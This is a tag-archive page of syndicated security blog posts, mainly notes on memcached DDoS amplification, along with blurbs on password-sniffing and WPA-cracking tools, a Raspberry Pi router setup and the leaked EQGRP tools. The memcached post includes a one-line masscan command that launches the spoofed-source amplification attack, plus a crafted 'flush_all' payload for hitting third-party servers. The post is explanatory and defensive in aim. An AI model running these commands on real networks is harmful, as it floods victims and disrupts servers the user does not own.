Tag Archives: pcap

Some notes on memcached DDoS

Post Syndicated from Robert Graham original http://blog.erratasec.com/2018/03/some-notes-on-memcached-ddos.html

I thought I’d write up some notes on the memcached DDoS. Specifically, I describe how many I found scanning the Internet with masscan, and how to use masscan as a killswitch to neuter the worst of the attacks.

Test your servers

I added code to my port scanner for this, then scanned the Internet:
masscan 0.0.0.0/0 -pU:11211 –banners | grep memcached
This example scans the entire Internet (/0). Replaced 0.0.0.0/0 with your address range (or ranges).
This produces output that looks like this:
Banner on port 11211/udp on 172.246.132.226: [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on 89.110.149.218: [memcached] uptime=3935192 time=1520485363 version=1.4.17
Banner on port 11211/udp on 172.246.132.226: [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on 84.200.45.2: [memcached] uptime=399858 time=1520485362 version=1.4.20
Banner on port 11211/udp on 5.1.66.2: [memcached] uptime=29429482 time=1520485363 version=1.4.20
Banner on port 11211/udp on 103.248.253.112: [memcached] uptime=2879363 time=1520485366 version=1.2.6
Banner on port 11211/udp on 193.240.236.171: [memcached] uptime=42083736 time=1520485365 version=1.4.13
The “banners” check filters out those with valid memcached responses, so you don’t get other stuff that isn’t memcached. To filter this output further, use  the ‘cut’ to grab just column 6:
… | cut -d ‘ ‘ -f 6 | cut -d: -f1
You often get multiple responses to just one query, so you’ll want to sort/uniq the list:
… | sort | uniq

My results from an Internet wide scan

I got 15181 results (or roughly 15,000).
People are using Shodan to find a list of memcached servers. They might be getting a lot results back that response to TCP instead of UDP. Only UDP can be used for the attack.

Other researchers scanned the Internet a few days ago and found ~31k. I don’t know if this means people have been removing these from the Internet.

Masscan as exploit script

BTW, you can not only use masscan to find amplifiers, you can also use it to carry out the DDoS. Simply import the list of amplifier IP addresses, then spoof the source address as that of the target. All the responses will go back to the source address.
masscan -iL amplifiers.txt -pU:11211 –spoof-ip –rate 100000
I point this out to show how there’s no magic in exploiting this. Numerous exploit scripts have been released, because it’s so easy.

Why memcached servers are vulnerable

Like many servers, memcached listens to local IP address 127.0.0.1 for local administration. By listening only on the local IP address, remote people cannot talk to the server.
However, this process is often buggy, and you end up listening on either 0.0.0.0 (all interfaces) or on one of the external interfaces. There’s a common Linux network stack issue where this keeps happening, like trying to get VMs connected to the network. I forget the exact details, but the point is that lots of servers that intend to listen only on 127.0.0.1 end up listening on external interfaces instead. It’s not a good security barrier.
Thus, there are lots of memcached servers listening on their control port (11211) on external interfaces.

How the protocol works

The protocol is documented here. It’s pretty straightforward.
The easiest amplification attacks is to send the “stats” command. This is 15 byte UDP packet that causes the server to send back either a large response full of useful statistics about the server.  You often see around 10 kilobytes of response across several packets.
A harder, but more effect attack uses a two step process. You first use the “add” or “set” commands to put chunks of data into the server, then send a “get” command to retrieve it. You can easily put 100-megabytes of data into the server this way, and causes a retrieval with a single “get” command.
That’s why this has been the largest amplification ever, because a single 100-byte packet can in theory cause a 100-megabytes response.
Doing the math, the 1.3 terabit/second DDoS divided across the 15,000 servers I found vulnerable on the Internet leads to an average of 100-megabits/second per server. This is fairly minor, and is indeed something even small servers (like Raspberry Pis) can generate.

Neutering the attack (“kill switch”)

If they are using the more powerful attack against you, you can neuter it: you can send a “flush_all” command back at the servers who are flooding you, causing them to drop all those large chunks of data from the cache.
I’m going to describe how I would do this.
First, get a list of attackers, meaning, the amplifiers that are flooding you. The way to do this is grab a packet sniffer and capture all packets with a source port of 11211. Here is an example using tcpdump.
tcpdump -i -w attackers.pcap src port 11221
Let that run for a while, then hit [ctrl-c] to stop, then extract the list of IP addresses in the capture file. The way I do this is with tshark (comes with Wireshark):
tshark -r attackers.pcap -Tfields -eip.src | sort | uniq > amplifiers.txt
Now, craft a flush_all payload. There are many ways of doing this. For example, if you are using nmap or masscan, you can add the bytes to the nmap-payloads.txt file. Also, masscan can read this directly from a packet capture file. To do this, first craft a packet, such as with the following command line foo:
echo -en “\x00\x00\x00\x00\x00\x01\x00\x00flush_all\r\n” | nc -q1 -u 11211
Capture this packet using tcpdump or something, and save into a file “flush_all.pcap”. If you want to skip this step, I’ve already done this for you, go grab the file from GitHub:
Now that we have our list of attackers (amplifiers.txt) and a payload to blast at them (flush_all.pcap), use masscan to send it:
masscan -iL amplifiers.txt -pU:112211 –pcap-payload flush_all.pcap

Reportedly, “shutdown” may also work to completely shutdown the amplifiers. I’ll leave that as an exercise for the reader, since of course you’ll be adversely affecting the servers.

Some notes

Here are some good reading on this attack:

USBPcap – USB Packet Capture For Windows

Post Syndicated from Darknet original https://www.darknet.org.uk/2018/01/usbpcap-usb-packet-capture-windows/?utm_source=rss&utm_medium=social&utm_campaign=darknetfeed

USBPcap – USB Packet Capture For Windows

USBPcap is an open-source USB Packet Capture tool for Windows that can be used together with Wireshark in order to analyse USB traffic without using a Virtual Machine.

Currently, the live capture can be done on “standard input” capture basis: you write a magic command in cmd.exe and you get the Wireshark to capture raw USB traffic on Windows.

USBPcapDriver has three “hats”:

  • Root Hub (USBPCAP_MAGIC_ROOTHUB)
  • Control (USBPCAP_MAGIC_CONTROL)
  • Device (USBPCAP_MAGIC_DEVICE)

What you won’t see using USBPcap

As USBPcap captures URBs passed between functional device object (FDO) and physical device object (PDO) there are some USB communications elements that you will notice only in hardware USB sniffer.

Read the rest of USBPcap – USB Packet Capture For Windows now! Only available at Darknet.

coWPAtty Download – Audit Pre-shared WPA Keys

Post Syndicated from Darknet original https://www.darknet.org.uk/2017/12/cowpatty-audit-pre-shared-wpa-keys/?utm_source=rss&utm_medium=social&utm_campaign=darknetfeed

coWPAtty Download – Audit Pre-shared WPA Keys

coWPAtty is a C-based tool for running a brute-force dictionary attack against WPA-PSK and audit pre-shared WPA keys.

If you are auditing WPA-PSK networks, you can use this tool to identify weak passphrases that were used to generate the PMK. Supply a libpcap capture file that includes the 4-way handshake, a dictionary file of passphrases to guess with, and the SSID for the network.

What is coWPAtty?

coWPAtty is the implementation of an offline dictionary attack against WPA/WPA2 networks using PSK-based authentication (e.g.

Read the rest of coWPAtty Download – Audit Pre-shared WPA Keys now! Only available at Darknet.

net-creds – Sniff Passwords From Interface or PCAP File

Post Syndicated from Darknet original https://www.darknet.org.uk/2017/12/net-creds-sniff-passwords-from-interface-or-pcap-file/?utm_source=rss&utm_medium=social&utm_campaign=darknetfeed

net-creds – Sniff Passwords From Interface or PCAP File

net-creds is a Python-based tool for sniffing plaintext passwords and hashes from a network interface or PCAP file – it doesn’t rely on port numbers for service identification and can concatenate fragmented packets.

Features of net-creds for Sniffing Passwords

It can sniff the following directly from a network interface or from a PCAP file:

  • URLs visited
  • POST loads sent
  • HTTP form logins/passwords
  • HTTP basic auth logins/passwords
  • HTTP searches
  • FTP logins/passwords
  • IRC logins/passwords
  • POP logins/passwords
  • IMAP logins/passwords
  • Telnet logins/passwords
  • SMTP logins/passwords
  • SNMP community string
  • NTLMv1/v2 all supported protocols: HTTP, SMB, LDAP, etc.

Read the rest of net-creds – Sniff Passwords From Interface or PCAP File now! Only available at Darknet.

Burner laptops for DEF CON

Post Syndicated from Robert Graham original http://blog.erratasec.com/2017/07/burner-laptops-for-def-con.html

Hacker summer camp (Defcon, Blackhat, BSidesLV) is upon us, so I thought I’d write up some quick notes about bringing a “burner” laptop. Chrome is your best choice in terms of security, but I need Windows/Linux tools, so I got a Windows laptop.

I chose the Asus e200ha for $199 from Amazon with free (and fast) shipping. There are similar notebooks with roughly the same hardware and price from other manufacturers (HP, Dell, etc.), so I’m not sure how this compares against those other ones. However, it fits my needs as a “burner” laptop, namely:

  • cheap
  • lasts 10 hours easily on battery
  • weighs 2.2 pounds (1 kilogram)
  • 11.6 inch and thin

Some other specs are:

  • 4 gigs of RAM
  • 32 gigs of eMMC flash memory
  • quad core 1.44 GHz Intel Atom CPU
  • Windows 10
  • free Microsoft Office 365 for one year
  • good, large keyboard
  • good, large touchpad
  • USB 3.0
  • microSD
  • WiFi ac
  • no fans, completely silent

There are compromises, of course.

  • The Atom CPU is slow, thought it’s only noticeable when churning through heavy webpages. Adblocking addons or Brave are a necessity. Most things are usably fast, such as using Microsoft Word.
  • Crappy sound and video, though VLC does a fine job playing movies with headphones on the airplane. Using in bright sunlight will be difficult.
  • micro-HDMI, keep in mind if intending to do presos from it, you’ll need an HDMI adapter
  • It has limited storage, 32gigs in theory, about half that usable.
  • Does special Windows 10 compressed install that you can’t actually upgrade without a completely new install. It doesn’t have the latest Windows 10 Creators update. I lost a gig thinking I could compress system files.

Copying files across the 802.11ac WiFi to the disk was quite fast, several hundred megabits-per-second. The eMMC isn’t as fast as an SSD, but its a lot faster than typical SD card speeds.

The first thing I did once I got the notebook was to install the free VeraCrypt full disk encryption. The CPU has AES acceleration, so it’s fast. There is a problem with the keyboard driver during boot that makes it really hard to enter long passwords — you have to carefully type one key at a time to prevent extra keystrokes from being entered.

You can’t really install Linux on this computer, but you can use virtual machines. I installed VirtualBox and downloaded the Kali VM. I had some problems attaching USB devices to the VM. First of all, VirtualBox requires a separate downloaded extension to get USB working. Second, it conflicts with USBpcap that I installed for Wireshark.

It comes with one year of free Office 365. Obviously, Microsoft is hoping to hook the user into a longer term commitment, but in practice next year at this time I’d get another burner $200 laptop rather than spend $99 on extending the Office 365 license.

Let’s talk about the CPU. It’s Intel’s “Atom” processor, not their mainstream (Core i3 etc.) processor. Even though it has roughly the same GHz as the processor in a 11inch MacBook Air and twice the cores, it’s noticeably and painfully slower. This is especially noticeable on ad-heavy web pages, while other things seem to work just fine. It has hardware acceleration for most video formats, though I had trouble getting Netflix to work.

The tradeoff for a slow CPU is phenomenal battery life. It seems to last forever on battery. It’s really pretty cool.

Conclusion

A Chromebook is likely more secure, but for my needs, this $200 is perfect.

Security updates for Tuesday

Post Syndicated from ris original https://lwn.net/Articles/722246/rss

Security updates have been issued by Debian (libtirpc and libytnef), Fedora (python-fedora, roundcubemail, and tnef), Mageia (ntp and virtualbox), openSUSE (dpkg, ghostscript, kernel, libressl, mysql-community-server, quagga, tcpdump, libpcap, xen, and zziplib), Red Hat (java-1.7.0-openjdk), Scientific Linux (java-1.7.0-openjdk), and SUSE (samba).

Security updates for Thursday

Post Syndicated from jake original https://lwn.net/Articles/715404/rss

Security updates have been issued by Arch Linux (bzip2, kernel, and linux-zen), CentOS (kernel), Debian (bitlbee, kernel, and tomcat7), Fedora (diffoscope, mujs, pcre, plasma-desktop, and tomcat), Mageia (libpcap/tcpdump and spice), Oracle (kernel), Red Hat (kernel, kernel-rt, and python-oslo-middleware), SUSE (php5 and util-linux), Ubuntu (imagemagick), and openSUSE (gd, kernel, libXpm, and libquicktime).

Netdiscover – Network Address Discovery Tool

Post Syndicated from Darknet original http://feedproxy.google.com/~r/darknethackers/~3/MH2xooF7SfI/

Netdiscover is a network address discovery tool that was developed mainly for those wireless networks without DHCP servers, though it also works on wired networks. It sends ARP requests and sniffs for replies. Built on top of libnet and libpcap, it can passively detect on-line hosts, or search for them, by actively sending ARP requests,…

Read the full post at darknet.org.uk

Configuring Raspberry Pi as a router

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/10/configuring-raspberry-pi-as-router.html

I’m setting up a little test network for IoT devices, one isolated a bit from my home network. This is a perfect job for a computer like the Raspberry Pi (or similar computers, such as the Odroid-C2, which is what I’m actually using here). I thought I’d blog the setup details in case anybody else wanted to setup their own isolated home network.
Choice of hardware

The Raspberry Pi B v3 is a fine choice, but there are many alternatives. I’m using the Odroid C2 instead. It’s nearly the same, but the chief difference for my purposes is that the Ethernet adapter is native. On the RPi, the Ethernet adapter is actually connected via USB. Network utilities don’t like USB Ethernet as much.
The choice of hardware dictates the operating system. Download the latest version of Ubuntu for the Odroid C2. They keep moving around where to get it, but you can google “odroid c2 downloads” to find it. My version is Ubuntu MATE 16.04 LTS.
Your home network

Your home network likely uses the addresses 192.168.1.xxx. This is also the range that most of the devices I’m testing will use as their initial defaults. Therefore, I’ve changed my network to something strange that won’t share the address range, like 10.20.30.x.
sudo bash

On the Internet, help text always prefixes sudo in front of every line. This is tedious. I just open up a root bash prompt instead. All the examples below assume that.
Reconfigure the hostname

The first step for me is always reconfiguring the hostname. I’ve got a bunch of small systems and VMs, and if I don’t remember to reset the hostname, I go crazy. You do this by editing the files  /etc/hostname and the file /ets/hosts.
vi /etc/hostname
vi /etc/hosts
I’m naming this device odroidrouter.
Reconfigure networking

All these small computers seem to be using some form of Debian, which usually uses the ifupdown method of configuring the network. It’s in flux and always changing, but my current configuration looks like the following.
vi /etc/network/interfaces

auto usbnet0
allow-hotplug usbnet0
iface usbnet0 inet static
        address 10.20.30.45
        netmask 255.255.255.0
        gateway 10.20.30.1
        dns-nameservers 8.8.8.8 8.8.4.4

iface usbnet0 inet6 auto

auto eth0
allow-hotplug eth0
iface eth0 inet static
        address 192.168.1.1
        netmask 255.255.0.0
I’ve got two Ethernet interfaces, the built-in one (eth0) and the additional one I get from plugging in a USB dongle (usbnet0).
The WAN interface, the one point to the Internet, is usbnet0
The local interface, the one on the isolated network, is eth0. That’s because I’m going to be running network tools like tcpdump on that interface, so I want the “real” Ethernet to be in that direction.
Turn on routing

You need to turn on the routing bit. The best way to do it is in the sysctl.conf file.
vi /etc/sysctl.conf
There’s usually a commented-out line with the parameter we want, just uncomment-it-out. Otherwise, add the line:
net.ipv4.ip_forward=1
Note that there are many other ways of doing this. For example, routing could be off until you plug in the Ethernet cable, using the ifupdown configuration files. In that case, you’ll need a line that does something like
echo 1 > /proc/sys/net/ipv4/ip_forward
You’ll also want to run that command if you want to immediately test things out, without having to reboot.
Turn on NATting
Reconfigure that iptables firewall with the following to turn on NAT.
iptables -t nat -A POSTROUTING -o usbnet0 -j MASQUERADE
iptables -A FORWARD -i eth0 -o usbnet0 -m state –state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i usbnet0 -o eth0 -j ACCEPT
But these configuration change aren’t persistent. To make them persistent, you need to install iptables-persistent.

apt-get install iptables-persistent
It’ll ask you while installing if you want to make the changes persistent. Do that. Otherwise, later you’ll need to do this:
iptables-save > /etc/iptables/rules.v4


Turn on DHCP server

Some of the devices on our isolated network come with static IP addresses, like 192.168.1.10. Some use DHCP, so we’ll need to install a DHCP server.
apt-get install isc-dhcp-server
You’ll then need to edit the configuration file. The defaults are fine, but you need to tell it which address ranges you need to give out:
subnet 192.168.1.0 netmask 255.255.255.0 {
  range 192.168.1.100 192.168.1.200;
  option routers 192.168.1.1;
  option domain-name-servers 8.8.8.8, 8.8.4.4;
  option domain-name “example.com”;
}
You then want to tell the DHCP service which Interface to use when serving requests, so you don’t serve them on the wrong adapter.
vi /etc/default/isc-dhcp-server
Make sure you have the following line, usually by editing the line that is already there in the defaults
INTERFACES=”eth0″
If you want to turn on DHCP before rebooting, you can start the service:
service start isc-dhcp-server
It’s easy to make a mistake with the configuration files, but dhcpd gives no error messages. To get them, you need to install syslog. It’s a pain in the ass.

Isolation

I want my isolated devices to get to the Internet, but I don’t want them to be able to access my internal network. Therefore, I need to add a firewall rule that prevents them from accessing my own subnet. However, this rule needs to be done so that I can still reach the router/firewall machine from my subnet. Therefore, the rule needs to be placed on the eth0 interface, and not generically in the stack or on the usbnet0 interface. Note that I use the -I directive here, to insert the dropping rule before the forwarding rules configured above.

iptables -I FORWARD -d 10.20.30.0/24 -i eth0 -j DROP

Logging into the test machine I can confirm that I can ping my local subnet before this firewall rule, but not after. But, I can still log into the gateway device from my local network.


Port forwarding

Now that I have my victim device safely on an isolated network, with outbound access to the Internet, I need to forward ports from the Internet to the victim machine. The ports that it is listening on are:

There are two steps here. First, I need to configure my home router to forward ports to this RPi router. The second step is to use IP tables to forward those ports to the target device.

One question is whether you use the same port number. In other words, I want to forward Telnet on port 23 from the Internet to this device. I could therefore write firewall rules that just changes the IP address. However, in case of accidents, this is unsafe. I’d rather have a brittle configuration that’ll easily fail rather than allow hackers into my local network.

Therefore, on my firewall router, I’ve mapped port 50001 to port 23 on the target victim device.

iptables -A PREROUTING -t nat -i usbnet0 -p tcp –dport 50001 -j DNAT –to 192.168.1.10:23

On my home Internet gateway, I do the reverse, mapping Internet-visible Telnet port 23 to port 50001 on my RPi firwall. In other words, the two mappings I’ve done are:

internet:23 -> 10.20.30.45:50001
10.20.30.45:50001 -> 192.168.1.10:23


Capturing packets

Now that I’ve I’ve isolated my test device, I’ll want to monitor it. I’ll want to monitor what traffic it sends out to the Internet when I turn it on. Then, when I expose it to the Internet to get infected, I want to monitor all the traffic going into and out of it.

Because the log files can get big, I’ll wan to rotate the log files. I’ve chosen to rotate them every hour. I do this with the command:

tcpdump -i eth0 -G 3600 -w ‘cameradome-%Y%m%d-%H.pcap’

BTW, since I need to leave this process running in the background when I log off, I run this under a screen session. I suppose I should just run this during startup, detached as a demon, but I”m too lazy.

Since this is an RPi class device, I probably don’t want to log the packets to the SD card. Instead, I log them to an external USB flash drive. Thus, before executing tcpdump I did:

mkdir ~/lexar
mount /dev/sda1 lexar


Rate limiting

In my setup, the isolated devices may be used to execute DDoS attacks. I don’t want that, obviously. To fix this, I can rate limit. There are various ways of traffic shaping on Linux for advanced purposes, but really, I just want something simple — anything that will stop this from being useful in a DDoS.

There are many extensions to iptables (man iptables-extensions). One is a simple extension, called limit, that limits how often a rule will match per second (per hour, per day, etc.). The easiest way to use that extension is on the NAT rule, to prevent how many connections per second can be NATted. Change the above rule to this:

iptables  -A FORWARD -i eth0 -o usbnet0 -m state –state RELATED,ESTABLISHED -m limit –limit 10/sec -j ACCEPT

This is the same NAT rule above, but we use the -m option to tell it to use the matching extension module named “limit”. Then, we use the new –limit option (works only with this module) to set a rate of 10-per-second. What that means is that after this rule triggers 10 times in a second, on the 11th, it won’t.

However, the packet will still be forwarded. That’s because this is the default action for iptables if no rule matches. It’ll be sent with the wrong IP address, so it can never receive responses. That’ll block TCP based DDoS, but not those that do simple UDP and ICMP floods. We need to do something that, by default, blocks forwarded packets if no rule matches.

One way is to set the default policy for the chain named “FORWARD”:

iptables -P FORWARD DROP

This seems to block everything. I don’t know why, my iptables foo isn’t good enough. So instead, I just add a block rule that matches the NAT rule:

iptables -A FORWARD -i eth0 -o usbnet0 -j DROP

The -A parameter means to append this rule after all the others. If a rule matches before this, then iptables stops walking the chain, and never reaches this drop rule. When nothing matches, because of the rate limiting feature, then the packet will reach this rule and get dropped.

Secure Your Containers with this One Weird Trick (RHEL Blog)

Post Syndicated from jake original http://lwn.net/Articles/703784/rss

Over on the Red Hat Enterprise Linux Blog, Dan Walsh writes about using Linux capabilities to help secure Docker containers. “Let’s look at the default list of capabilities available to privileged processes in a docker container:

chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap.

In the OCI/runc spec they are even more drastic only retaining, audit_write, kill, and net_bind_service and users can use ocitools to add additional capabilities. As you can imagine, I like the approach of adding capabilities you need rather than having to remember to remove capabilities you don’t.” He then goes through the capabilities listed describing what they govern and when they might need to be turned on for a container application.

WTF Yahoo/FISA search in kernel?

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/10/wtf-yahoofisa-search-in-kernel.html

A surprising detail in the Yahoo/FISA email search scandal is that they do it with a kernel module. I thought I’d write up some (rambling) notes.

What the government was searching for

As described in the previoius blog post, we’ll assume the government is searching for the following string, and possibly other strings like it within emails:

### Begin ASRAR El Mojahedeen v2.0 Encrypted Message ###

I point this out because it’s simple search identifying things. It’s not natural language processing. It’s not searching for phrases like “bomb president”.

Also, it’s not AV/spam/childporn processing. Those look at different things. For example, filtering message containing childporn involves calculating a SHA2 hash of email attachments and looking up the hashes in a table of known bad content (or even more in-depth analysis). This is quite different from searching.

The Kernel vs. User Space

Operating systems have two parts, the kernel and user space. The kernel is the operating system proper (e.g. the “Linux kernel”). The software we run is in user space, such as browsers, word processors, games, web servers, databases, GNU utilities [sic], and so on.

The kernel has raw access to the machine, memory, network devices, graphics cards, and so on. User space has virtual access to these things. The user space is the original “virtual machines”, before kernels got so bloated that we needed a third layer to virtualize them too.

This separation between kernel and user has two main benefits. The first is security, controlling which bit of software has access to what. It means, for example, that one user on the machine can’t access another’s files. The second benefit is stability: if one program crashes, the others continue to run unaffected.

Downside of a Kernel Module

Writing a search program as a kernel module (instead of a user space module) defeats the benefits of user space programs, making the machine less stable and less secure.

Moreover, the sort of thing this module does (parsing emails) has a history of big gapping security flaws. Parsing stuff in the kernel makes cybersecurity experts run away screaming in terror.

On the other hand, people have been doing security stuff (SSL implementations and anti-virus scanning) in the kernel in other situations, so it’s not unprecedented. I mean, it’s still wrong, but it’s been done before.

Upside of a Kernel Module

If doing this is as a kernel module (instead of in user space) is so bad, then why does Yahoo do it? It’s probably due to the widely held, but false, belief that putting stuff in the kernel makes it faster.

Everybody knows that kernels are faster, for two reasons. First is that as a program runs, making a system call switches context, from running in user space to running in kernel space. This step is expensive/slow. Kernel modules don’t incur this expense, because code just jumps from one location in the kernel to another. The second performance issue is virtual memory, where reading memory requires an extra step in user space, to translate the virtual memory address to a physical one. Kernel modules access physical memory directly, without this extra step.

But everyone is wrong. Using features like hugepages gets rid of the cost of virtual memory translation cost. There are ways to mitigate the cost of user/kernel transitions, such as moving data in bulk instead of a little bit at a time. Also, CPUs have improved in recent years, dramatically reducing the cost of a kernel/user transition.

The problem we face, though, is inertia. Everyone knows moving modules into the kernel makes things faster. It’s hard getting them to un-learn what they’ve been taught.

Also, following this logic, Yahoo may already have many email handling functions in the kernel. If they’ve already gone down the route of bad design, then they’d have to do this email search as a kernel module as well, to avoid the user/kernel transition cost.

Another possible reason for the kernel-module is that it’s what the programmers knew how to do. That’s especially true if the contractor has experience with other kernel software, such as NSA implants. They might’ve read Phrack magazine on the topic, which might have been their sole education on the subject. [http://phrack.org/issues/61/13.html]

How it was probably done

I don’t know Yahoo’s infrastructure. Presumably they have front-end systems designed to balance the load (and accelerate SSL processing), and back-end systems that do the heavy processing, such as spam and virus checking.

The typical way to do this sort of thing (search) is simply tap into the network traffic, either as a separate computer sniffing (eavesdropping on) the network, or something within the system that taps into the network traffic, such as a netfilter module. Netfilter is the Linux firewall mechanism, and has ways to easily “hook” into specific traffic, either from user space or from a kernel module. There is also a related user space mechanism of hooking network APIs like recv() with a preload shared library.

This traditional mechanism doesn’t work as well anymore. For one thing, incoming email traffic is likely encrypted using SSL (using STARTTLS, for example). For another thing, companies are increasingly encrypting intra-data-center traffic, either with SSL or with hard-coded keys.

Therefore, instead of tapping into network traffic, the code might tap directly into the mail handling software. A good example of this is Sendmail’s milter interface, that allows the easy creation of third-party mail filtering applications, specifically for spam and anti-virus.

But it would be insane to write a milter as a kernel module, since mail handling is done in user space, thus adding unnecessary user/kernel transitions. Consequently, we make the assumption that Yahoo’s intra-data-center traffic in unencrypted, and that for FISA search thing, they wrote something like a kernel-module with netfilter hooks.

How it should’ve been done

Assuming the above guess is correct, that they used kernel netfilter hooks, there are a few alternatives.

They could do user space netfilter hooks instead, but they do have a performance impact. They require a transition from the kernel to user, then a second transition back into the kernel. If the system is designed for high performance, this might be a noticeable performance impact. I doubt it, as it’s still small compared to the rest of the computations involved, but it’s the sort of thing that engineers are prejudiced against, even before they measure the performance impact.

A better way of doing it is hooking the libraries. These days, most software uses shared libraries (.so) to make system calls like recv(). You can write your own shared library, and preload it. When the library function is called, you do your own processing, then call the original function.

Hooking the libraries then lets you tap into the network traffic, but without any additional kernel/user transition.

Yet another way is simple changes in the mail handling software that allows custom hooks to be written.

Third party contractors

We’ve been thinking in terms of technical solutions. There is also the problem of politics.

Almost certainly, the solution was developed by outsiders, by defense contractors like Booz-Allen. (I point them out because of the whole Snowden/Martin thing). This restricts your technical options.

You don’t want to give contractors access to your source code. Nor do you want to the contractors to be making custom changes to your source code, such as adding hooks. Therefore, you are looking at external changes, such as hooking the network stack.

The advantage of a netfilter hook in the kernel is that it has the least additional impact on the system. It can be developed and thoroughly tested by Booz-Allen, then delivered to Yahoo!, who can then install it with little effort.

This is my #1 guess why this was a kernel module – it allowed the most separation between Yahoo! and a defense contractor who wrote it. In other words, there is no technical reason for it — but a political reason.

Let’s talk search

There two ways to search things: using an NFA and using a DFA.

An NFA is the normal way of using regex, or grep. It allows complex patterns to be written, but it requires a potentially large amount of CPU power (i.e. it’s slow). It also requires backtracking within a message, thus meaning the entire email must be reassembled before searching can begin.

The DFA alternative instead creates a large table in memory, then does a single pass over a message to search. Because it does only a single pass, without backtracking, the message can be streamed through the search module, without needing to reassemble the message. In theory, anything searched by an NFA can be searched by a DFA, though in practice some unbounded regex expressions require too much memory, so DFAs usually require simpler patterns.

The DFA approach, by the way, is about 4-gbps per 2.x-GHz Intel x86 server CPU. Because no reassembly is required, it can tap directly into anything above the TCP stack, like netfilter. Or, it can tap below the TCP stack (like libpcap), but would require some logic to re-order/de-duplicate TCP packets, to present the same ordered stream as TCP.

DFAs would therefore require little or no memory. In contrast, the NFA approach will require more CPU and memory just to reassemble email messages, and the search itself would also be slower.

The naïve approach to searching is to use NFAs. It’s what most people start out with. The smart approach is to use DFAs. You see that in the evolution of the Snort intrusion detection engine, where they started out using complex NFAs and then over the years switched to the faster DFAs.

You also see it in the network processor market. These are specialized CPUs designed for things like firewalls. They advertise fast regex acceleration, but what they really do is just convert NFAs into something that is mostly a DFA, which you can do on any processor anyway. I have a low opinion of network processors, since what they accelerate are bad decisions. Correctly designed network applications don’t need any special acceleration, except maybe SSL public-key crypto.

So, what the government’s code needs to do is a very lightweight parse of the SMTP protocol in order to extract the from/to email addresses, then a very lightweight search of the message’s content in order to detect if any of the offending strings have been found. When the pattern is found, it then reports the addresses it found.

Conclusion

I don’t know Yahoo’s system for processing incoming emails. I don’t know the contents of the court order forcing them to do a search, and what needs to be secret. Therefore, I’m only making guesses here.

But they are educated guesses. In 9 times out of 10 in situations similar to Yahoo, I’m guessing that a “kernel module” would be the most natural solution. It’s how engineers are trained to think, and it would likely be the best fit organizationally. Sure, it really REALLY annoys cybersecurity experts, but nobody cares what we think, so that doesn’t matter.

EQGRP tools are post-exploitation

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/08/eqgrp-tools-are-post-exploitation.html

A recent leak exposed hackings tools from the “Equation Group”, a group likely related to the NSA TAO (the NSA/DoD hacking group). I thought I’d write up some comments.

Despite the existence of 0days, these tools seem to be overwhelmingly post-exploitation. They aren’t the sorts of tools you use to break into a network — but the sorts of tools you use afterwards.

The focus of the tools appear to be about hacking into network equipment, installing implants, achievement permanence, and using the equipment to sniff network traffic.

Different pentesters have different ways of doing things once they’ve gotten inside a network, and this is reflected in their toolkits. Some focus on Windows and getting domain admin control, and have tools like mimikatz. Other’s focus on webapps, and how to install hostile PHP scripts. In this case, these tools reflect a methodology that goes after network equipment.

It’s a good strategy. Finding equipment is easy, and undetectable, just do a traceroute. As long as network equipment isn’t causing problems, sysadmins ignore it, so your implants are unlikely to be detected. Internal network equipment is rarely patched, so old exploits are still likely to work. Some tools appear to target bugs in equipment that are likely older than Equation Group itself.

In particular, because network equipment is at the network center instead of the edges, you can reach out and sniff packets through the equipment. Half the time it’s a feature of the network equipment, so no special implant is needed. Conversely, when on the edge of the network, switches often prevent you from sniffing packets, and even if you exploit the switch (e.g. ARP flood), all you get are nearby machines. Getting critical machines from across the network requires remotely hacking network devices.

So you see a group of pentest-type people (TAO hackers) with a consistent methodology, and toolmakers who develop and refine tools for them. Tool development is a rare thing amount pentesters — they use tools, they don’t develop them. Having programmers on staff dramatically changes the nature of pentesting.

Consider the program xml2pcap. I don’t know what it does, but it looks like similar tools I’ve written in my own pentests. Various network devices will allow you to sniff packets, but produce output in custom formats. Therefore, you need to write a quick-and-dirty tool that converts from that weird format back into the standard pcap format for use with tools like Wireshark. More than once I’ve had to convert HTML/XML output to pcap. Setting port filters for 21 (FTP) and Telnet (23) produces low-bandwidth traffic with high return (admin passwords) within networks — all you need is a script that can convert the packets into standard format to exploit this.

Also consider the tftpd tool in the dump. Many network devices support that protocol for updating firmware and configuration. That’s pretty much all it’s used for. This points to a defensive security strategy for your organization: log all TFTP traffic.

Same applies to SNMP. By the way, SNMP vulnerabilities in network equipment is still low hanging fruit. SNMP stores thousands of configuration parameters and statistics in a big tree, meaning that it has an enormous attack surface. Anything value that’s a settable, variable-length value (OCTECT STRING, OBJECT IDENTIFIER) is something you can play with for buffer-overflows and format string bugs. The Cisco 0day in the toolkit was one example.

Some have pointed out that the code in the tools is crappy, and they make obvious crypto errors (such as using the same initialization vectors). This is nonsense. It’s largely pentesters, not software developers, creating these tools. And they have limited threat models — encryption is to avoid easy detection that they are exfiltrating data, not to prevent somebody from looking at the data.

From that perspective, then, this is fine code, with some effort spent at quality for tools that don’t particularly need it. I’m a professional coder, and my little scripts often suck worse than the code I see here.

Lastly, I don’t think it’s a hack of the NSA themselves. Those people are over-the-top paranoid about opsec. But 95% of the US cyber-industrial-complex is made of up companies, who are much more lax about security than the NSA itself. It’s probably one of those companies that got popped — such as an employee who went to DEFCON and accidentally left his notebook computer open on the hotel WiFi.

Conclusion

Despite the 0days, these appear to be post-exploitation tools. They look like the sort of tools pentesters might develop over years, where each time they pop a target, they do a little development based on the devices they find inside that new network in order to compromise more machines/data.

Instrumenting masscan for AFL network fuzzing

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/06/instrumenting-masscan-for-afl-fuzzing.html

This blog post is about work in progress. You probably don’t want to read it.


So I saw this tweet today:

As it turns it, he’s just fuzzing input files. This is good, he’s apparently already found some bugs, but it’s not a huge threat.

Instead, what really needs to be fuzzed is network input. This is chronic problem with AFL, which is designed for inserting files, not network traffic, into programs.

But making this work is actually pretty trivial. I just need to make a tiny change to masscan so that instead of opening a libpcap adapter, it instead opens a libpcap formatted file.

